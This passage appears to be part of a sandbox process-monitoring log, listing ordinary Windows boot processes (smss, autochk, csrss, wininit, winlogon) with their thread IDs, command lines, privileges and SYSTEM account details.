os_tid = 0x9c Thread: id = 154 os_tid = 0x3c Thread: id = 155 os_tid = 0x34 Thread: id = 157 os_tid = 0xf4 Thread: id = 159 os_tid = 0x48 Thread: id = 160 os_tid = 0x2c Thread: id = 161 os_tid = 0x100 Thread: id = 162 os_tid = 0x104 Thread: id = 163 os_tid = 0x108 Thread: id = 164 os_tid = 0x8c Thread: id = 165 os_tid = 0x80 Thread: id = 166 os_tid = 0x10c Thread: id = 167 os_tid = 0x110 Thread: id = 168 os_tid = 0x118 Thread: id = 169 os_tid = 0x64 Thread: id = 170 os_tid = 0x78 Thread: id = 171 os_tid = 0x90 Thread: id = 175 os_tid = 0x130 Thread: id = 176 os_tid = 0x134 Thread: id = 177 os_tid = 0x138 Thread: id = 178 os_tid = 0x13c Thread: id = 183 os_tid = 0xb0 Thread: id = 197 os_tid = 0x68 Thread: id = 198 os_tid = 0x24 Thread: id = 199 os_tid = 0x190 Process: id = "15" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cbdc000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 151 os_tid = 0xe4 Thread: id = 156 os_tid = 0xec Thread: id = 172 os_tid = 0x11c Thread: id = 184 os_tid = 0x160 Process: id = "16" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2c401000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 158 os_tid = 0xfc Process: id = "17" image_name = "smss.exe" filename = 
"c:\\windows\\system32\\smss.exe" page_root = "0x2c755000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 173 os_tid = 0x124 Process: id = "18" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c155000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x120" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 174 os_tid = 0x12c Thread: id = 179 os_tid = 0x140 Thread: id = 180 os_tid = 0x144 Thread: id = 181 os_tid = 0x148 Thread: id = 182 os_tid = 0x14c Thread: id = 192 os_tid = 0x184 Thread: id = 200 os_tid = 0x198 Thread: id = 201 os_tid = 0x19c Process: id = "19" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x1a75b000" os_pid = "0x150" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7] Thread: id = 185 os_tid = 0x154 Process: id = "20" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x1a65b000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x120" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 186 os_tid = 0x15c Thread: id = 194 os_tid = 0x188 Thread: id = 195 os_tid = 0x18c Process: id = "21" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x1a303000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x150" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 187 os_tid = 0x168 Thread: id = 188 os_tid = 0x16c Thread: id = 189 os_tid = 0x170 Thread: id = 190 os_tid = 0x174 Thread: id = 191 os_tid = 0x178 Thread: id = 196 os_tid = 0x194 Process: id = "22" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1a809000" os_pid = "0x17c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x150" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" 
os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 193 os_tid = 0x180